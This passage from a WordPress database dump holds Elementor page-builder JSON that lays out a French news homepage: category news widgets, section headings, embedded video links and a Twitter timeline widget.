ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"4\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#0099f4\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"1\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"R\\u00e9cent\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"lf137zu\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category_border_color\":\"#31c6b0\",\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_excerpt\":\"\",\"button_bg_color\":\"#31c6b0\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0,\"category_border_color\":\"#4a00b4\",\"button_bg_color\":\"#4a00b4\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"4\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"2\"],\"excerpt_value\":10},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bguffns\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"15hcw7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ptqj2h6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Autres\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ub0yntr\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tkvnvir\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(2379,764,'_elementor_version','0.4'),(2381,765,'_elementor_edit_mode','builder'),(2382,765,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"17\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#fd0249\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#4a00b4\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ff6600\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"4\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#0099f4\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"1\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"stru